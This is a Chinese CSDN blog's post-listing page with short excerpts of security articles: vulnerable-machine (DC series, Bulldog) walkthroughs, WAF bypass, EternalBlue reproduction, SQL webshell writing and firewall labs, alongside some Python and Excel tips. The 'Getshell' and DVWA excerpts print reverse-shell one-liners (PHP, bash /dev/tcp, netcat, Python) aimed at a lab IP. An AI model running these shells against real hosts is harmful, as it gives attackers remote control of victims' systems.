- 博客(46)
- 收藏
- 关注
RSS订阅
转载 CSDN-markdown编辑器使用指南
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Ma...
2019-04-21 21:41:04
122
原创 【使用指南】Kettle转换使用教程
#Kettle转换使用教程##概述Kettle是一款国外开源的ETL工具,纯java编写的ETL工具 ,可以在Window、Linux、Unix上运行,绿色无需安装,数据抽取高效稳定。并且Kettle 是 PDI 以前的名称,现在PDI 的全称是Pentaho Data IntegerationETL是指EXTRACT(抽取)、TRANSFORM(转换)、LOAD(加载)。更多介绍可以访问Kettle中文网:http://www.kettle.net.cn/安装与配置运行环境:JDK1.5以上
2020-08-26 20:14:30
4530
转载 【Python】requests中content和text方法的区别
requests对象的get和post方法都会返回一个Response对象,这个对象里面存的是服务器返回的所有信息,包括响应头,响应状态码等。其中返回的网页部分会存在.content和.text两个对象中。两者区别在于,content中间存的是字节码,而text中存的是Beautifulsoup根据猜测的编码方式将content内容编码成字符串。直接输出content,会发现前面存在b’这样的标志,这是字节字符串的标志,而text是,没有前面的b,对于纯ascii码,这两个可以说一模一样,对于其他的文字
2020-07-20 01:10:51
333
转载 【Python】文件内容按行读取到列表中的方法
示例文件内容如下:HelloWorldPython通常来讲,我们如果只是迭代文件对象每一行,并做一些处理,是不需要将文件对象转成列表的,因为文件对象本身可迭代,而且是按行迭代:with open('somefile', 'r') as f: for line in f: print(line, end='') """HelloWorldPython"""包含换行符方式一with open('somefile','r') as f:
2020-07-20 00:56:36
1600
原创 【使用指南】Excel筛选包含指定文本所在的整行
使用Excel筛选包含指定文本所在的整行=COUNTIF($A1:$N1,"403")=COUNTIF($A1:$N1,"404")最终效果如下:
2020-07-14 22:18:26
6369
原创 【渗透项目】靶机DC-7渗透过程
信息收集主机发现靶机测试常规起手式:)nmap -sn 192.168.72.0/24-sn和-sP都是对主机进行ping扫描端口扫描nmap -Pn -T4 -A -v -p- 192.168.189.137 --script=vuln网站指纹扫描通过网站指纹扫描发现该网站的中间件使用了apache2.4.25,使用的CMS是Drupal 8python3 cmseek.py -u 192.168.189.137使用searchsploit和msfconsole也没
2020-05-10 19:00:55
694
原创 【渗透项目】靶机DC-6渗透过程
信息收集主机发现nmap -sn 192.168.189.0/24端口扫描nmap -sT -v -A 192.168.72.158 --script=vuln发现开放了80端口,尝试用浏览器对该站点进行访问该网站应该做了访问限制,只能通过域名的方式访问,但因为本地hosts中缺少对应的IP,导致域名解析失败而无法进行访问,解决办法是在hosts文件中写入对应域名和IP...
2020-05-05 10:27:13
702
原创 【渗透项目】靶机DC-5渗透过程
信息收集主机发现nmap -sn 192.168.189.0/24网站指纹whatweb 192.168.189.134端口扫描nmap -sV -O -T4 -p- -Pn -sT 192.168.189.134 --script vuln目录扫描dirb http://192.168.189.134 /usr/share/dirb/wordlists/com...
2020-04-17 11:47:08
560
原创 【WAF绕过】绕过XX狗
XX狗萌新学习之路上必绕的XX狗搭建过程搭建过程比较简单,但存在一些小问题具体说一下我所遇到的在安装过程中会自动弹出一个配置菜单,需要输入网站信息。一般来讲这些信息会自动获取,但是我所使用的phpstudy2018版即使安装apache但在服务中也无法找到正确服务名。解决方法:需要将phpstudy配置成为系统服务安装并开启apache服务如果在服务还是没有找到apache...
2020-04-13 10:12:48
1490
原创 【渗透项目】靶机DC-4渗透过程
信息收集主机发现nmap -sn 192.168.72.0/24端口扫描nmap -sV -T4 -O -sT -Pn -p- 192.168.72.156 --script vuln访问80端口,是一个登陆界面,页面如下目录扫描dirbuster没有发现其他有价值的目录漏洞利用通过对登陆页面的测试,发现该页面缺少防暴力破解的验证机制通过页面上的提示,尝试...
2020-04-12 20:15:01
353
原创 【渗透项目】靶机DC-3渗透过程
信息收集主机发现netdiscover -i eht0 -r 192.168.72.0/24端口扫描nmap -sS -sV -T4 -O -p- 192.168.72.155目录扫描gobuster dir -u http://192.168.72.155 -w /usr/share/dirb/wordlists/big.txt/.htpasswd (Statu...
2020-04-03 13:08:13
676
2
原创 【知识整理】利用SQL语句写shell的方法
利用SQL语句写shell的方法要利用sql写shell就需要在配置中满足以下条件:在mysql的配置文件my.ini中,secure_file_priv为空(被注释掉或不填)或者secure_file_priv配置是目录地址。未开启全局GPC关于mysql的secure_file_priv属性得多说几句当secure_file_priv为空时,mysql对导入导出文件是没有限制的...
2020-03-22 01:04:15
3532
1
原创 【知识整理】搜索引擎hacking语法整理
hacking语法有效的信息搜集方式是挖漏洞成功的一半信息泄露漏洞语法构造site:<指定站点> filetype:<文件类型> <文件包含的内容># 常用的方式举例filetype:txt 登陆filetype:xls 登陆filetype:doc 登陆...
2020-03-21 23:48:21
1487
原创 【渗透项目】靶机DC-1渗透过程
文章目录信息收集主机发现端口扫描网站指纹扫描目录扫描浏览网站漏洞利用提权操作后记本文是对靶机DC-1渗透的关键点进行简单记录信息收集主机发现端口扫描先利用masscan快速确认开放端口,再用nmap确认端口服务网站指纹扫描目录扫描浏览网站访问目标网站查找有用信息登陆网站就看到大大登陆界面,因此肯定先从这个登陆界面下手在尝试进行sql万能密码登陆以及确认已注册用户并...
2020-03-18 11:53:04
381
1
原创 【渗透项目】靶机DC-2渗透过程
文章目录信息收集IP扫描端口扫描目录暴破浏览网站漏洞利用SSH登陆提权操作工具介绍cewlwpscan文章主要是对靶机DC-2的一次渗透测试过程记录信息收集好的信息收集能大大提高渗透的成功率,因此要养成良好的信息收集习惯因为靶机与测试主机在同一网段内,首先需要做的就是获取靶机的IP地址这里就先介绍一下常见的同网段IP地址获取方法IP扫描nmap首先登场的是重量级工具NMAP,功能...
2020-03-17 14:07:47
804
原创 【知识整理】搜索引擎的艺术
搜索语法搜索引擎的搜索语法是一个”捕鱼技“,能提高我们在渗透过程中的效率常用的搜索关键字关键字说明site在指定的网站中进行搜索intitle搜索标题中含有关键字的网页inurl搜索URL中存在的关键字网页intext搜索正文中含有关键字的网页filetype搜索指定文件类型-关键字筛去搜索结果中包含“关键字”的网页在搜索引...
2020-01-27 23:32:28
220
原创 【编辑器漏洞】 FCKeditor敏感目录
FCKeditor敏感信息查看版本信息/FCKEditor/editor/dialog/fck_ about.html/FCKeditor/_ whatsnew.html默认上传页面/FCKEditor/editor/filemanager/browser/default/ browser.html/FCKEditor/editor/ilemanager/browser/default...
2020-01-27 00:59:18
839
原创 【知识整理】渗透思路总结
渗透思路总结文章目录渗透思路总结Hacker语法网站IP查找网站IP验证子域名查找旁站查找C段扫描网站支持的HTTP方法使用NMAP脚本扫描使用OPTIONS方法使用KALI中CURL漏洞扫描端口服务扫描网站指纹扫描网站目录扫描漏洞利用(完善中)SQL注入XXEXSSCSRFSSRFCRLF命令执行漏洞文件上传漏洞解析漏洞文件包含漏洞逻辑漏洞系统提权FINAL渗透报告的撰写进行信息收集,根据开...
2020-01-04 22:47:15
1911
原创 【使用指南】Docker上搭建Sqli-labs及使用
Docker上搭建Sqli-labs及使用 Docker 是一个开源的应用容器引擎,基于Go 语言并遵从 Apache2.0 协议开源。它可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口(类似 移动端的app),更重要的是容器性能开销极低。Ubuntu安装Docker...
2019-12-20 15:32:05
1769
原创 【渗透项目】Bulldog2网站渗透
Bulldog2网站渗透文章目录Bulldog2网站渗透渗透过程主机发现端口扫描服务扫描获取网站指纹信息扫描网页目录信息整理筛选页面元素审查尝试注册用户进行水平越权进行垂直越权逻辑漏洞利用反弹SHELL提权渗透过程靶机:IP地址未知测试机kali:ip192.168.72.141主机发现通过主机发现,发现了192.168.72.145和192.168.72.146两个IP端口扫描...
2019-12-13 23:32:03
431
原创 【渗透项目】Bulldog网站渗透
Bulldog网站渗透文章目录Bulldog网站渗透1.渗透思路测试环境测试步骤1.信息收集主机发现端口扫描操作系统扫描2.漏洞探测网站指纹信息扫描目录扫描3.信息利用4.漏洞利用5.权限提升1.渗透思路进行信息收集,根据开放的端口以及服务,寻找可行的渗透方法在未知目标主机的情况下,使用netdiscover主机发现获得主机IP地址得到主机的IP地址后,使用masscan进行快速的端口...
2019-12-13 21:59:46
479
1
原创 【知识整理】简单的系统提权
系统提权文章目录系统提权Windows与Linux系统的权限划分Window本地提权使用Sysinternal suite中的Psexec设置时间任务使用sc创建一个系统服务注入进程提权***(隐蔽痕迹)使用kali上的集成工具脏牛提权脏牛提权步骤VMware共享文件虚拟机中的共享文件路径Windows与Linux系统的权限划分本地提权系统账号之间权限隔离操作系统的安全基础用户空间...
2019-12-13 21:04:39
322
原创 【DVWA】反弹shell实验
反弹shell实验实验环境:metasploitable2;dvwa-linux版##操作过程进入kali的web服务根目录/var/www/html,写入getshell.py的python程序#leafpad getshell.pyimport socket,subprocess,oss=socket. socket( socket.AF_INET , socket. SOC...
2019-12-13 20:35:04
1301
原创 【知识整理】Getshell方法整理
Getshellphpphp -r '$sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");'bashbash -i >& /dev/tcp/192.168.37.131/8080 0>&1netcatrm /tmp/f;mk...
2019-12-05 22:41:50
1897
原创 【漏洞复现】永恒之蓝漏洞
永恒之蓝漏洞复现使用msfconsole来对ms17-010来进行扫描和利用靶机:win7-x64测试机:kali扫描ms17-010漏洞在kali中启动使用msfconsole启动msfconsole使用search ms17-010搜索关于ms17-010的模块先调用搜索到的模块,再查看搜索模块的配置选项需要设置IP地址,确认设置信息都没用遗漏后,运行扫描发现漏洞。可以使用...
2019-12-05 19:30:59
362
原创 【知识整理】HTTP响应
HTTP响应在接收到一个请求后,服务器会返回一个HTTP响应。HTTP响应包括:状态行、响应报头和响应正文01.状态行状态行包括:HTTP版本、状态码、以及解释状态码的简单短语,格式如下:HTTP-Version Status-Code Reason-phrase CRLF其中,状态码由三位数字组成,共有5大类33种,其第一个数字指定了响应类别,取值为1~5,后面两位没有明确的规定。...
2019-12-05 19:21:44
891
原创 【知识整理】Nmap与Masscan
Nmap与Masscan文章目录Nmap与MasscanNmap命令核心功能Masscan命令Namp与Masscan的对比NmapNmap ("Network Mapper(网络映射器)”)是一款开放源代码的网络探测和安全审核的工具。设计目标是快速地扫描大型网络,当然用它扫描单个主机也没有问题。使用原始IP报文来发现网络上有哪些主机,那些主机提供什么服务(应用程序名和版本),那些服...
2019-12-05 19:19:10
2998
原创 【网络安全】上网行为管理
上网行为管理上网行为 管理是指帮助互联网用户控制和管理对互联网的使用,包括对网页访问过滤、网络应用控制、带宽流量管理、信息收发审计、用户行为分析控制、监督、审核用户上网所发生的一切行为5个基本要素: 4W+1HWho(谁)When (时间)Where (访问哪里)What(什么内容、应用)How(结果)对网络的管控员工的不当行为引发的问题无法通过传统的网络安全设备来实现...
2019-12-05 18:52:51
4429
原创 【网络安全】入侵防御系统
入侵防御系统IPS(Intrusion Prevention System), 即入侵防御系统,有时又IDP(Intrusion detection and Prevention) ,即入侵检测和防御系统,指具备IDS的检测能力,同时在线部署在网络中、具备实时中止网络入侵的安全技术设备。IDS的局限性IDS主要功能为入侵检测,只能事后响应(需要一 定响应时间) 不能及时响应攻击与FW联动...
2019-12-05 16:31:08
2217
原创 【网络安全】WAF概述及各项功能
WAF概述及各项功能文章目录WAF概述及各项功能01.WAF的基本概念四大基本作用WEB安全业务连续系统加速数据分析02.WAF概述及各项功能WEB攻击防护敏感信息防泄漏网页防篡改DDOS防御DDOS攻击DDOS防御WEB扫描03.WAF的部署WAF的组网结构01.WAF的基本概念四大基本作用WEB安全WEB攻击防护敏感信息防泄漏网页防篡改业务连续DDOS攻击防御系统高可...
2019-12-05 16:27:00
3793
1
原创 【网络安全】虚拟专网系统
虚拟专网系统虚拟专网(Virtual Private Network)被定义为通过一个公用网络(通常是因特网)建立的一个临时的、安全的连接,就像一条穿过非安全网络的安全、稳定的隧道,对所传输的数据进行加密保护。虛拟专用网可以帮助远程用户、公司分支机构、商业伙伴及供应商同公司的内部网建立可信的安全连接,并保证数据的安全传输。01.IPSec/SSL简介 IPSec/SSL虚拟专网多合一网关本...
2019-12-05 16:22:33
1550
原创 【网络安全】防火墙系统
防火墙系统防火墙功能介绍支持透明、路由和混合三种工作模式。支持基于对象的网络访问控制,包括网络层、应zz用层等多层次的访问控制;支持URL、脚本、关键字、邮件等多种形式的内容过滤。支持多种网络地址转换(NAT) 方式。支持多种认证方式,如本地认证、证书认证、Radius认证、 TACACS、SecurlD、 LDAP、 域认证等。支持标准VPN。内置IDS模块,能够自防御Land、...
2019-12-05 16:18:51
673
原创 【网络安全】远程登陆虚拟专网实验
远程登陆虚拟专网实验文章目录远程登陆虚拟专网实验01.实验拓扑02.实验命令==胖客户端的SSL==03.实验过程先进行==无客户端的SSL==实验过程:在WIN7上开启telnet服务在XP上开启telnet服务在WIN7上开启ftp与web服务接下来就是关于==胖客户端的SSL==实验过程:01.实验拓扑02.实验命令ASA的预配ASA1(config)# int e0/1ASA...
2019-12-05 16:08:48
908
原创 【网络安全】Easy虚拟专网实验
Easy虚拟专网实验文章目录Easy虚拟专网实验01.实验拓扑02.实验命令Easy虚拟专网03.实验过程Easy虚拟专网01.实验拓扑02.实验命令Easy虚拟专网1.配置ISAKMP安全策略(可以和IPsec共用一个策略)ASA12(config)# crypto isakmp enable outsideASA1(config)# crypto isakmp policy 1...
2019-12-05 16:01:04
2706
原创 【网络安全】IPsec虚拟专用网络实验
虚拟专用网络实验实验步骤防火墙预配配置PAT配置虚拟专用网络启用NAT豁免测试结果与分析原因实验拓扑根据拓扑,配置路由器和PC的IP地址实验命令1.预配ASA1ciscoasa(config)# int e0/0ciscoasa(config-if)# nameif insideciscoasa(config-if)# ip add 192.168.10.2 25...
2019-10-29 22:11:42
873
原创 【网络安全】IPsec虚拟专用网络
虚拟专用网络01.虚拟专用网络的定义1.1广域网存在各种的安全风险网上传输数据有被窃听的风险网上传输数据有被篡改的风险通信双方有被冒充的风险###1.2虚拟专用网络保护实体之间通信使用加密技术防止数据被窃听数据完整性验证方式数据被破坏、篡改通过认证机制确认身份,防止数据被截获、回访02.虚拟专用网络的连接模式2.1传输模式封装模式相对肩带...
2019-10-29 22:06:26
1108
原创 【网络安全】防火墙的NAT实验
防火墙的NAT实验实验步骤配置IP地址,并检测直连链路通信无异常依次进行动态NAT、PAT和静态NAT、PAT的配置再进行NAT豁免实验依次进行实验的结果测试实验拓扑根据拓扑,配置路由器和PC的IP地址,因为配置IP地址比较简单,这里就不一一记录实验命令ASA防火墙ciscoasa(config)# int e0/1ciscoasa(config-if)# nameif...
2019-10-29 13:22:01
2230
原创 【网络安全】硬件防火墙ASA
硬件防火墙01. 状态防火墙的认识1.1 基本概念状态防火墙(英语:Stateful firewall),一种能够提供状态数据包检查(stateful packet inspection,缩写为SPI)或状态查看(stateful inspection)功能的防火墙,能够持续追踪穿过这个防火墙的各种网络连接(例如TCP与UDP连接)的状态。这种防火墙被设计来区分不同连接种类下的合法数据包。只...
2019-10-28 01:04:57
1061
1
原创 MPLS的配置实验
文章目录实验拓扑配置步骤1.Core IGP2.MPLS3.MBGP4.CE-PE5.CE-PE重分布进BGP(可选)6.BGP重分布CE-PE(可选)实验拓扑配置步骤1.Core IGP在MPLS VPN域内配置if# ip add 10.1.0.1 255.255.255.255if# ip add 10.1.12.1 255.255.255.0con# router rip...
2019-10-25 00:22:48
2594
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人